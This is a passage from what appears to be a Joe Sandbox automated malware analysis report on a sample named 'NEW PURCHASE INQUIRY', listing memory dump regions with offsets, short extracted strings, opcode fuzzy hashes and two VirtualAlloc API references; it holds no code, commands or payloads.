                                        • Source File: 00000000.00000002.2203284695.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6930000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4'jq
                                        • API String ID: 0-3676250632
                                        • Opcode ID: 3253d8c83ab218cfc7ec82afce73281a43cdc2ac3e160d060714950d0c9d2403
                                        • Instruction ID: 40f7137739e2bd879dc3ca83e9c11df3ee0c917cebb9a6fa071222b0efc4b36f
                                        • Opcode Fuzzy Hash: 3253d8c83ab218cfc7ec82afce73281a43cdc2ac3e160d060714950d0c9d2403
                                        • Instruction Fuzzy Hash: B6718E30B402249FDB44DF64D954BAE7BF6EFC8704F214469E506AB3A5CB759C42CB90
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2180610051.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_1220000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Tejq
                                        • API String ID: 0-2468842661
                                        • Opcode ID: 32511af2d211465c652471e7fb639087bd60f0127ae81b50375918eda83f3c93
                                        • Instruction ID: 996348924de22689565c20e9a1f108191701f7f25375a1060fe8803c69b4da56
                                        • Opcode Fuzzy Hash: 32511af2d211465c652471e7fb639087bd60f0127ae81b50375918eda83f3c93
                                        • Instruction Fuzzy Hash: 95618C30B002159FC708EB79C458B6E7BF2AFC9304F258469E406EB3A6CE759C46CB51
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203344371.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6940000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: @
                                        • API String ID: 0-2766056989
                                        • Opcode ID: 903501d63856c3f44d848a89f78d3390bb8efc5d359186fa611e64f21dd3238b
                                        • Instruction ID: 3452d14947448901393221aa915e5b68419508fffa7ac555327848fcc0476345
                                        • Opcode Fuzzy Hash: 903501d63856c3f44d848a89f78d3390bb8efc5d359186fa611e64f21dd3238b
                                        • Instruction Fuzzy Hash: C791D274A09268CFDBA0DF68D884B99BBB1FB49304F1091EAD60DA7344DB305E85CF51
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203344371.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6940000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: @
                                        • API String ID: 0-2766056989
                                        • Opcode ID: db752f44cefeb68374d3647b089fa9987562120bcf36ee2a93953ae56a6379ec
                                        • Instruction ID: d0f7fe70434105f46b95114141197b189066db72748dad3ba877f8f073608fc1
                                        • Opcode Fuzzy Hash: db752f44cefeb68374d3647b089fa9987562120bcf36ee2a93953ae56a6379ec
                                        • Instruction Fuzzy Hash: 0C81D374A05268CFEBA0DF68D884B9DBBB2FB49304F1091AAD60DA7344DB305E85CF51
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203284695.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6930000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4'jq
                                        • API String ID: 0-3676250632
                                        • Opcode ID: 238c81438bf6517bf9df5823870ff0b4f4f0c0ec6429402b503d4ed48112f00b
                                        • Instruction ID: 74df31dc2f83ac0b2e9df0b33c279caee48be414a58b5ba3691858d043675a18
                                        • Opcode Fuzzy Hash: 238c81438bf6517bf9df5823870ff0b4f4f0c0ec6429402b503d4ed48112f00b
                                        • Instruction Fuzzy Hash: 30417D727406149FC744DB68D854E6A7BEAEF88714F114169E6098F3B2CB75EC02CB91
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203856165.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6a70000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: pnq
                                        • API String ID: 0-1150273632
                                        • Opcode ID: 66170cdf360a8b49307071ffc3b0906ef9be8bc67f14624f3fd5051c31f4ac8d
                                        • Instruction ID: 6ca051a9e85d764862e3245abf9aaa82d96731daa37921f87324f29a2cdbc304
                                        • Opcode Fuzzy Hash: 66170cdf360a8b49307071ffc3b0906ef9be8bc67f14624f3fd5051c31f4ac8d
                                        • Instruction Fuzzy Hash: 56514B76640110AFCB469FA8CD04D6ABFA7FF8C31471A8094E209DB276DA36CC22DB50
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203344371.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6940000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: #
                                        • API String ID: 0-1885708031
                                        • Opcode ID: 9234822f27c1ee6fad0507bfb896ba64302ba4504eefb047e3f89efbb90a3689
                                        • Instruction ID: bf4f2039653bb363387fd0275568943d9e2fc834dc787e323e5504ef95e75a0b
                                        • Opcode Fuzzy Hash: 9234822f27c1ee6fad0507bfb896ba64302ba4504eefb047e3f89efbb90a3689
                                        • Instruction Fuzzy Hash: A8614970904208DFDB54DFA9C984BDEBBF2FF49314F24816AE809AB656C7319985CB60
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203344371.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6940000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: #
                                        • API String ID: 0-1885708031
                                        • Opcode ID: d56ebf8b115eba2a9fa59d4f589910902e83b474f7ecfeca2451c070deb5f8f9
                                        • Instruction ID: e7f2c1eabc6a977e1f26cb4e1e03bb56d0a3942727df4aa038b53501a8d29d61
                                        • Opcode Fuzzy Hash: d56ebf8b115eba2a9fa59d4f589910902e83b474f7ecfeca2451c070deb5f8f9
                                        • Instruction Fuzzy Hash: D961C174A04218CFEB50DFA8D588FAEBBF2FB49304F208159E819A7751C734A941DF95
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203344371.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6940000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: #
                                        • API String ID: 0-1885708031
                                        • Opcode ID: a079151a0ad4fef4e8979fb73935f57b662b9bc30603ce6d2290079aeca0a61c
                                        • Instruction ID: e2969f150fee69c1875963fcb44ac289402561938f16e7596792f9271e10a571
                                        • Opcode Fuzzy Hash: a079151a0ad4fef4e8979fb73935f57b662b9bc30603ce6d2290079aeca0a61c
                                        • Instruction Fuzzy Hash: 2261D078A09218CFDB50DFA8D588FAEBBF2FB49304F208159E819A7741C734A944DF95
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203284695.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6930000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: (nq
                                        • API String ID: 0-2756854522
                                        • Opcode ID: 652714d5e2ee7b7c02d57e93c9f58eb821437c0f1065788eff81548838ba622a
                                        • Instruction ID: 394f7bda099625e452c012342b349664bb581c1fe834163b1e2b2f355fa6fcc3
                                        • Opcode Fuzzy Hash: 652714d5e2ee7b7c02d57e93c9f58eb821437c0f1065788eff81548838ba622a
                                        • Instruction Fuzzy Hash: E251B2327042509FCB459F68D858D6A7FF6EF89310B1A80E6E605CF672CA35DC12DB51
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203284695.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6930000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4'jq
                                        • API String ID: 0-3676250632
                                        • Opcode ID: 75d6da0caacfd15fd9a69f2a38bb6769568aacb616ab3cda81e6fe1df22bd9f3
                                        • Instruction ID: fcaaa1d497160b64c961dc9fcce458de31b5c1f866bce2b4f862b989696c35bb
                                        • Opcode Fuzzy Hash: 75d6da0caacfd15fd9a69f2a38bb6769568aacb616ab3cda81e6fe1df22bd9f3
                                        • Instruction Fuzzy Hash: 06414130B106249FCB94EB64C854AAEB7BBEFC8700F10451AE517AB798DF749C46CB91
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203344371.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6940000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: (nq
                                        • API String ID: 0-2756854522
                                        • Opcode ID: 2518d1fd5818d8aa5e9e75a0ad7547b9573066da9dfcf1341f70008b3a68959f
                                        • Instruction ID: 75c661d0b7811f5ffd10e4893b29b96c6eddee91e6c8d8c60a18de51f81aa9e6
                                        • Opcode Fuzzy Hash: 2518d1fd5818d8aa5e9e75a0ad7547b9573066da9dfcf1341f70008b3a68959f
                                        • Instruction Fuzzy Hash: 49518D34A00616CFCB54DF69C880D6ABBF6FF89310B298A59D456AB791D730F801CBA5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203344371.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6940000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: #
                                        • API String ID: 0-1885708031
                                        • Opcode ID: 97629ec299aead5be88db071425aa3312149d6652ee0e8b624b56a964789b774
                                        • Instruction ID: 017722770488d8afa7a1083ef5bdec851cb6ee669d0a0b70fe9f23aabe13c0a7
                                        • Opcode Fuzzy Hash: 97629ec299aead5be88db071425aa3312149d6652ee0e8b624b56a964789b774
                                        • Instruction Fuzzy Hash: 2851D478A08218DFDB50DFA8D984EAEBBF2FB49304F209159E819A7741C734AD41CF95
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203344371.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6940000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: #
                                        • API String ID: 0-1885708031
                                        • Opcode ID: 9f29a7588009dda893da75f138e9814c592d8cab44148bfeae62e5db187c07ab
                                        • Instruction ID: c7c7c2d98067b7637a82a1caadbc0d7edc52a794a312ac243e7382905dba5077
                                        • Opcode Fuzzy Hash: 9f29a7588009dda893da75f138e9814c592d8cab44148bfeae62e5db187c07ab
                                        • Instruction Fuzzy Hash: 3851C078A08218CFDB50DFA8D588EAEBBF2FB49304F208159E819A7745C734AD41DF95
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203344371.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6940000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: #
                                        • API String ID: 0-1885708031
                                        • Opcode ID: b736dc117246c3870f74adc478d61d10af7bf68acad186168614813b91e4075d
                                        • Instruction ID: 3ff6bf4f9e092e39ec21519bd0ce44ff3585401288a129ab789b51652eb61ab6
                                        • Opcode Fuzzy Hash: b736dc117246c3870f74adc478d61d10af7bf68acad186168614813b91e4075d
                                        • Instruction Fuzzy Hash: 8B51C078A08218CFDB50DFA8D588EAEBBF2FB49304F208159E819A7745C734AD41DF95
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203344371.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6940000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: #
                                        • API String ID: 0-1885708031
                                        • Opcode ID: c9b848889c994210fb930c78200ee88f3a1cbca9a96fc489af5068dc8869237f
                                        • Instruction ID: c377e17c0afd8e85890d469ae04c1dbb5a53e6fd7a03e73d29a4bc3787b399ce
                                        • Opcode Fuzzy Hash: c9b848889c994210fb930c78200ee88f3a1cbca9a96fc489af5068dc8869237f
                                        • Instruction Fuzzy Hash: 2F51C078A08218CFDB50DFA8D588EAEBBF2FB49304F208159E819A7745C734AD41DF95
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203344371.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6940000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: #
                                        • API String ID: 0-1885708031
                                        • Opcode ID: 35f3833d286d12294d5531db0f542d49c99dce8e500108d37ecb92c43233099d
                                        • Instruction ID: 2fe17b257690be950d12d10550ebf95fdd4a850063ce5d20740c414dd8c984d4
                                        • Opcode Fuzzy Hash: 35f3833d286d12294d5531db0f542d49c99dce8e500108d37ecb92c43233099d
                                        • Instruction Fuzzy Hash: FE51E178A08218CFDB50DFA8D588EAEBBF2FB49304F208159E819A7741C734A941CF95
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2180610051.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_1220000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Tejq
                                        • API String ID: 0-2468842661
                                        • Opcode ID: aea0f0644cbd408ee960d4ca4b3294f12a91b7a108ea4b723f168194dc3f65ea
                                        • Instruction ID: f62291ec019b53c68bd293128f5217d673328a701d8ad4b0c94c937cd0fb334a
                                        • Opcode Fuzzy Hash: aea0f0644cbd408ee960d4ca4b3294f12a91b7a108ea4b723f168194dc3f65ea
                                        • Instruction Fuzzy Hash: 70412830B101159FCB48AF78D598A6D7BF2EF88704F258469E106EB3A6CE759C46CB41
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203284695.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6930000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4'jq
                                        • API String ID: 0-3676250632
                                        • Opcode ID: 6b38ed922c20a5fe5694a07f82d0bcc5b90b28ba6ce00076c542c12a52009748
                                        • Instruction ID: 7c935a838731b130aa05402a2cd37cb2dd9cf7271a7883e8dc5e19b58c76b9ed
                                        • Opcode Fuzzy Hash: 6b38ed922c20a5fe5694a07f82d0bcc5b90b28ba6ce00076c542c12a52009748
                                        • Instruction Fuzzy Hash: 49318E717406149FD348EB29D958F2B77EAAFC8B04F114568E60ACB3A5CE75EC02CB90
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2202621764.0000000006830000.00000040.00000800.00020000.00000000.sdmp, Offset: 06830000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6830000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Hnq
                                        • API String ID: 0-2896580000
                                        • Opcode ID: 652accabf73223d71c14d78c633e26389f5654cb6f2f875f4413db972995e89c
                                        • Instruction ID: d5c28456ad75826a4d09223adc0ec9c9021666b23b4e26e849925c0bd9a58672
                                        • Opcode Fuzzy Hash: 652accabf73223d71c14d78c633e26389f5654cb6f2f875f4413db972995e89c
                                        • Instruction Fuzzy Hash: 5731C330B042149FC754DB79C85896E7BF6EF85710B1141AAE949DB3A2CB31EC46C7A1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203344371.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6940000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $
                                        • API String ID: 0-3993045852
                                        • Opcode ID: 60d181d02a90cb0adc33234b678deb95b15d6f087d3ad5112ce4925d4c0b9b4d
                                        • Instruction ID: 4db7e51e7cbc771d13bd1d5e30fd624cb2fc183f020feab04d3a19091e73b6ab
                                        • Opcode Fuzzy Hash: 60d181d02a90cb0adc33234b678deb95b15d6f087d3ad5112ce4925d4c0b9b4d
                                        • Instruction Fuzzy Hash: F6413474E08218CFEB54DFA9C944BAEBBF2FB89300F108169E519A7741C7749845DF91
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203284695.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6930000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: W
                                        • API String ID: 0-655174618
                                        • Opcode ID: c2cd015b9c75e2c8ce816c6d2419d738ad9e61957bdbd34a38ea92709a81423a
                                        • Instruction ID: 199c54d5666dc1489b52a65c7cdea00d0edfc699e0773a40af7ac9e17c964606
                                        • Opcode Fuzzy Hash: c2cd015b9c75e2c8ce816c6d2419d738ad9e61957bdbd34a38ea92709a81423a
                                        • Instruction Fuzzy Hash: 22317035A001299FDB54DFA8D855AEEB7B6FF88310F108029E855BB7A4CB359D11CBA0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203344371.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6940000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4'jq
                                        • API String ID: 0-3676250632
                                        • Opcode ID: 553531d563f89eb99100c53fb7f561f991319848e7d51cc04232c94c7fb6c661
                                        • Instruction ID: f10b2c6566df1056d82a540c2828d7fead97984877a75e6aa990fee9084c5231
                                        • Opcode Fuzzy Hash: 553531d563f89eb99100c53fb7f561f991319848e7d51cc04232c94c7fb6c661
                                        • Instruction Fuzzy Hash: FA31B175B40214AFCB459FA4C844D6EBFB7EF88310B0540AAEA06DB365CA31DC06CBA1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203284695.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6930000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4'jq
                                        • API String ID: 0-3676250632
                                        • Opcode ID: 78fbe75a89bef5f4d8ec1cbb85d793ae6ad31894e5847eaf463d92ede78d7ba7
                                        • Instruction ID: 97eedd2d934621925d887628c1f884f412ace045eba44a3c0c4873d915cc693d
                                        • Opcode Fuzzy Hash: 78fbe75a89bef5f4d8ec1cbb85d793ae6ad31894e5847eaf463d92ede78d7ba7
                                        • Instruction Fuzzy Hash: B3216730B002245BDB54AB65C85866EBBEBEFC8700F11441EE517EB799CF759C06C791
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2202531116.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6810000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4'jq
                                        • API String ID: 0-3676250632
                                        • Opcode ID: 8f4961100c63ec085f88a142a2dd5275d83e6a03443bf48fec10e4f080199089
                                        • Instruction ID: d54977e8c5a00b9567670560c775722c6bd494139d29f16d5b0c4c3dc29a6a73
                                        • Opcode Fuzzy Hash: 8f4961100c63ec085f88a142a2dd5275d83e6a03443bf48fec10e4f080199089
                                        • Instruction Fuzzy Hash: DD3188B0D04209DFDB55CFA5C4086FEBBB9EF45311F00846AD211AB281D7381E89CF91
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2202621764.0000000006830000.00000040.00000800.00020000.00000000.sdmp, Offset: 06830000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6830000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: p<jq
                                        • API String ID: 0-3743064563
                                        • Opcode ID: 2b56c76ac43f65d53a29d392ef78f86740a94205f6a9a0ee23bc62aa2bcd764d
                                        • Instruction ID: 752fba754320b682dcea79edd8886c15773757dd6f14422ddc635b2f2dbb1e2f
                                        • Opcode Fuzzy Hash: 2b56c76ac43f65d53a29d392ef78f86740a94205f6a9a0ee23bc62aa2bcd764d
                                        • Instruction Fuzzy Hash: 68217C34B041949FDB41CF2AC840AAA7BEABF8D300F154095FE55CB360D675DC50CBA0
                                        APIs
                                        • VirtualAlloc.KERNEL32(?,?,?,?), ref: 067E16F3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2202408945.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_67e0000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: 36734648dbc4830476429cd3ff35590c5b6007f01d497c77e95e167f98faa126
                                        • Instruction ID: 65648b77ba2b9b3aaab8518e3addd22ea671f4bb21d650ad0fe64ac877072e48
                                        • Opcode Fuzzy Hash: 36734648dbc4830476429cd3ff35590c5b6007f01d497c77e95e167f98faa126
                                        • Instruction Fuzzy Hash: 201126B58002498FCB20DFAAC945AEEBFF5EF88324F148419D519A7250CB799944CF91
                                        APIs
                                        • VirtualAlloc.KERNEL32(?,?,?,?), ref: 067E16F3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2202408945.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_67e0000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: f3d6345eb9c6fc71d991cb5d54ea18049868c405040aca3abde0b256146d52de
                                        • Instruction ID: 4acdf375b60ce13b93392cb2190fda2ec449adff79e184f0bbfd11f5514a638f
                                        • Opcode Fuzzy Hash: f3d6345eb9c6fc71d991cb5d54ea18049868c405040aca3abde0b256146d52de
                                        • Instruction Fuzzy Hash: BC1134B18003488FCB20DFAAC945AEEBBF5EF88724F148419D519A7250CB79A944CBA0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2180610051.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_1220000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: .
                                        • API String ID: 0-248832578
                                        • Opcode ID: d5b666ada1c2b8f4e0ecee2fe0cee9ebb1ba850964a2246b4264043ba086e223
                                        • Instruction ID: c7b982f55baefbc946135cb1742b77a6e9ed2d7ade201e06b39a839baae3d5cc
                                        • Opcode Fuzzy Hash: d5b666ada1c2b8f4e0ecee2fe0cee9ebb1ba850964a2246b4264043ba086e223
                                        • Instruction Fuzzy Hash: 49119370815968DFCBB08F18DD987EEB7B0BB09316F1410EAD509B2690DBB45AC48F05
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203344371.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6940000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: +
                                        • API String ID: 0-2126386893
                                        • Opcode ID: 4f1c9fbd3a809dbd0d2d4a16762689a2772553ff330bb4f457775f736279c33c
                                        • Instruction ID: bee794c61faaed88ada3bc549d76ad0ece8eb7bb721321bb64f5c4988cb9e75f
                                        • Opcode Fuzzy Hash: 4f1c9fbd3a809dbd0d2d4a16762689a2772553ff330bb4f457775f736279c33c
                                        • Instruction Fuzzy Hash: F6011070A01219CFDB90DF58D884FAAB7B5FB06304F0081A6E849EB240C370AE85CF51
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203344371.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6940000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $
                                        • API String ID: 0-3993045852
                                        • Opcode ID: 291bf8fde47009e2754e868772d055eb24ba916d233c1b4d57a4bcd2e279f255
                                        • Instruction ID: 42d3162c25ad71a5c91819b513860ca8501c0ce040d77dd09b568ec345b262c3
                                        • Opcode Fuzzy Hash: 291bf8fde47009e2754e868772d055eb24ba916d233c1b4d57a4bcd2e279f255
                                        • Instruction Fuzzy Hash: 8401EEB0A01119CFEB54CF68D984FADBBF5BB09304F1082A6E909E7641D730AE82CF40
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2204677410.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6cd0000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: L
                                        • API String ID: 0-2909332022
                                        • Opcode ID: a8910a0b2ddfe81d772ebf3be0ef523d7a646bba6136dca6bfede8bb02c8830a
                                        • Instruction ID: b67c13466f5eba5538c3769ed30f9c342cd9d200119f31e133636f12d66305df
                                        • Opcode Fuzzy Hash: a8910a0b2ddfe81d772ebf3be0ef523d7a646bba6136dca6bfede8bb02c8830a
                                        • Instruction Fuzzy Hash: 35013C70A41218CFEBA4DF58C854B9AB7B5FB48304F1090EAD609B3346C7349E85CF41
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203856165.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6a70000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Tejq
                                        • API String ID: 0-2468842661
                                        • Opcode ID: b45ade6a70a69fbdda8cc28161c724d936eabeb4ba8287b18afe59cde429cc75
                                        • Instruction ID: b1db8156d080bb666c0d895e59e0ec0f5a6260cfb40c49c9fcb9de1f83299d63
                                        • Opcode Fuzzy Hash: b45ade6a70a69fbdda8cc28161c724d936eabeb4ba8287b18afe59cde429cc75
                                        • Instruction Fuzzy Hash: 52F0DF74A4022A8FCB20DF68D991BEEB7B2EB59300F2080A9C44AA3354DA311E85CF51
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2202621764.0000000006830000.00000040.00000800.00020000.00000000.sdmp, Offset: 06830000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6830000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: X
                                        • API String ID: 0-3081909835
                                        • Opcode ID: 6bf202d60461434168dcbeca247a75bb67f75c6d8f66e99508fceb902b565f7d
                                        • Instruction ID: 4cfcbc951c399b0af8c2d364b995dc8f6b9c0c8d34b89cc4ffd1c227421167fe
                                        • Opcode Fuzzy Hash: 6bf202d60461434168dcbeca247a75bb67f75c6d8f66e99508fceb902b565f7d
                                        • Instruction Fuzzy Hash: F7F07F70D5122A9FDBA5DF64C988BAEB7B5BB08244F1085F9E818A3250DB715A858F40
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2180610051.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_1220000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: I
                                        • API String ID: 0-3707901625
                                        • Opcode ID: ecb830ccfd306753a113a3f458f8f2c44703df9903bc2e0ebe8ae28c170254ec
                                        • Instruction ID: 7e0ad9af6b309f7f1b3389d19944870b5ef25eba5f697e1102abf76a954cae32
